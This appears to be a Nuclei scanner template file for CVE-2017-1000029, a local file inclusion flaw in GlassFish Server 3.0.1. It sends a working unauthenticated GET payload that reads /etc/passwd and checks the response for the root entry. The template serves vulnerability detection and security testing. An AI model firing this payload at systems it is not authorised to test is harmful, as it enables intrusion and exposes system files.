nuclei-templates/cves/2017/CVE-2017-1000029.yaml

32 lines
993 B
YAML
Raw Normal View History

2022-04-05 10:33:13 +00:00
id: CVE-2017-1000029
2022-04-05 10:33:13 +00:00
info:
name: GlassFish Server Open Source Edition 3.0.1 - LFI
author: 0x_Akoko
severity: high
description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication.
reference:
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
- https://www.cvedetails.com/cve/CVE-2017-1000029
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-1000029
cwe-id: CWE-200
tags: cve,cve2017,glassfish,oracle,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/resource/file%3a///etc/passwd/"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
2022-04-05 10:33:13 +00:00
- type: status
status:
- 200